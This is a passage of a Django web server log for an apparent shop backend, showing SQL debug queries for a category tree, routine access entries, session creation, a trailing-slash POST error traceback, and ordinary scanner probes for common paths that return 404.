ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:31:25,812 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:31:25,815 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:31:25,817 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:31:25,820 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:31:25,822 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:31:25,826 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:31:25,828 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:31:25,830 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:31:25,833 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:31:25,835 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:31:25,839 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:31:25,841 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:31:25,843 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:31:25,846 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:31:25,848 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:31:25,850 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:31:25,853 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:31:25,856 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:31:25,858 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:31:25,861 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:31:25,863 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:31:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:31:25] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 14:31:26] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:31:26] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 14:31:26] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 14:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 14:40:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 14:45:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 14:53:12] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [13/Dec/2019 15:00:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:03:58] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [13/Dec/2019 15:04:12] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [13/Dec/2019 15:04:14] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=111 HTTP/1.0" 404 6705 Not Found: /newslist.asp [13/Dec/2019 15:04:16] "GET /newslist.asp?type=4&id=1283 HTTP/1.0" 404 6649 [13/Dec/2019 15:05:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:10:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:15:30] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:20:34] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:25:37] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:30:40] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:40:45] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:45:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:50:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 15:55:53] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:02:13] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:07:35] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:12:37] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:19:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:24:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:24:56] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 16:24:56,407 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dpo0j4ekf8zcede48498zjku4gadkx2n' LIMIT 1; args=('dpo0j4ekf8zcede48498zjku4gadkx2n',) DEBUG 2019-12-13 16:24:56,409 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dpo0j4ekf8zcede48498zjku4gadkx2n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-27T16:24:56.408078+00:00'::timestamptz); args=('dpo0j4ekf8zcede48498zjku4gadkx2n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 27, 16, 24, 56, 408078, tzinfo=)) [13/Dec/2019 16:24:56] "GET /login/?next=/ HTTP/1.0" 200 1786 [13/Dec/2019 16:29:53] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:35:41] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:40:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:49:20] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:54:22] "GET / HTTP/1.0" 302 0 [13/Dec/2019 16:59:25] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:14:46] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:23:58] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:29:01] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:40:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:45:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:53:54] "GET / HTTP/1.0" 302 0 [13/Dec/2019 17:58:56] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:03:57] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:09:01] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:14:04] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:19:56] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:26:28] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:35:41] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:38:28] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:44:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:49:53] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:54:55] "GET / HTTP/1.0" 302 0 [13/Dec/2019 18:59:58] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:12:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [13/Dec/2019 19:17:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:22:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:27:11] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:42:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:47:21] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:52:25] "GET / HTTP/1.0" 302 0 [13/Dec/2019 19:53:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 19:53:33,582 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '258mug91mhp44actafeweq6e6v967dhg' LIMIT 1; args=('258mug91mhp44actafeweq6e6v967dhg',) DEBUG 2019-12-13 19:53:33,584 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('258mug91mhp44actafeweq6e6v967dhg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-27T19:53:33.583327+00:00'::timestamptz); args=('258mug91mhp44actafeweq6e6v967dhg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 27, 19, 53, 33, 583327, tzinfo=)) [13/Dec/2019 19:53:33] "GET /login/?next=/ HTTP/1.0" 200 1786 [13/Dec/2019 19:57:27] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:05:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:14:22] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:18:59] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:19:52] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:25:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:30:56] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:35:59] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:41:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:48:18] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:53:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 20:58:53] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:04:34] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:09:37] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:14:40] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:19:43] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:24:46] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:29:48] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:35:42] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:40:45] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:44:47] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [13/Dec/2019 21:45:08] "GET /proxy.php HTTP/1.0" 404 6627 [13/Dec/2019 21:45:48] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:50:51] "GET / HTTP/1.0" 302 0 [13/Dec/2019 21:55:53] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:05:02] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:14:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:19:06] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:24:08] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:29:12] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:35:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [13/Dec/2019 22:41:42] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [13/Dec/2019 22:42:17] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=112 HTTP/1.0" 404 6705 Not Found: /newslist.asp [13/Dec/2019 22:42:41] "GET /newslist.asp?type=4&id=1301 HTTP/1.0" 404 6649 [13/Dec/2019 22:44:31] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:49:33] "GET / HTTP/1.0" 302 0 Not Found: /Temporary_Listen_Addresses/SMSSERVICE [13/Dec/2019 22:49:43] "GET /Temporary_Listen_Addresses/SMSSERVICE HTTP/1.0" 404 6704 [13/Dec/2019 22:54:36] "GET / HTTP/1.0" 302 0 [13/Dec/2019 22:59:39] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:16:13] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:21:15] "GET / HTTP/1.0" 302 0 Not Found: /admin/config.php [13/Dec/2019 23:26:03] "GET /admin/config.php HTTP/1.0" 404 9248 [13/Dec/2019 23:26:19] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:35:41] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:40:44] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:45:47] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:50:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 23:55:53] "GET / HTTP/1.0" 302 0 Not Found: /login/submit/onlyy [14/Dec/2019 00:04:26] "GET /login/submit/onlyy HTTP/1.0" 404 6647 [14/Dec/2019 00:05:25] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:10:27] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:12:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:15:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:19:28] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:21:34] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:30:00] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:35:41] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [14/Dec/2019 00:41:29] "POST /editBlackAndWhiteList HTTP/1.0" 500 63820 [14/Dec/2019 00:42:20] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:47:23] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:52:26] "GET / HTTP/1.0" 302 0 [14/Dec/2019 00:57:29] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-14 01:05:03,622 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l3c5k1dhohybxtdbv23hkte7n6gorase' LIMIT 1; args=('l3c5k1dhohybxtdbv23hkte7n6gorase',) DEBUG 2019-12-14 01:05:03,624 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l3c5k1dhohybxtdbv23hkte7n6gorase', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T01:05:03.622581+00:00'::timestamptz); args=('l3c5k1dhohybxtdbv23hkte7n6gorase', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 1, 5, 3, 622581, tzinfo=)) [14/Dec/2019 01:05:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [14/Dec/2019 01:14:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:19:25] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:24:27] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:29:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:49:18] "GET / HTTP/1.0" 302 0 [14/Dec/2019 01:55:56] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:03:04] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:08:49] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:13:51] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:18:54] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:23:57] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:29:00] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:34:12] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:40:17] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:46:23] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:51:26] "GET / HTTP/1.0" 302 0 [14/Dec/2019 02:56:28] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:15:54] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:20:57] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:28:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:35:42] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:45:47] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:50:50] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [14/Dec/2019 03:55:53] "GET / HTTP/1.0" 302 0 [14/Dec/2019 03:57:29] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:05:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:10:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:22:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:27:32] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:35:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:45:46] "GET / HTTP/1.0" 302 0 [14/Dec/2019 04:53:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:00:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:05:14] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:10:16] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:15:19] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:20:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:25:25] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:30:28] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:35:31] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:40:34] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:45:37] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:53:52] "GET / HTTP/1.0" 302 0 [14/Dec/2019 05:58:55] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:05:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:07:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:11:22] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:16:25] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:21:27] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:26:30] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:33:40] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:38:56] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:43:59] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:46:58] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:49:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 06:54:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:00:02] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:05:05] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:10:08] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:15:11] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [14/Dec/2019 07:18:31] "GET /proxy.php HTTP/1.0" 404 6629 Not Found: /robots.txt [14/Dec/2019 07:19:09] "GET /robots.txt HTTP/1.0" 404 6624 DEBUG 2019-12-14 07:19:10,187 utils 20136 140506411554560 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'x193vtr030vdp2qb4o3avivjx5pwjvmx' LIMIT 1; args=('x193vtr030vdp2qb4o3avivjx5pwjvmx',) DEBUG 2019-12-14 07:19:10,189 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('x193vtr030vdp2qb4o3avivjx5pwjvmx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-28T07:19:10.187862+00:00'::timestamptz); args=('x193vtr030vdp2qb4o3avivjx5pwjvmx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 28, 7, 19, 10, 187862, tzinfo=)) [14/Dec/2019 07:19:10] "GET /login/?next=/%3FC%3DS%3BO%3DA HTTP/1.0" 200 1810 [14/Dec/2019 07:20:13] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:25:16] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:30:18] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:35:41] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:40:44] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:45:46] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:54:55] "GET / HTTP/1.0" 302 0 [14/Dec/2019 07:59:57] "GET / 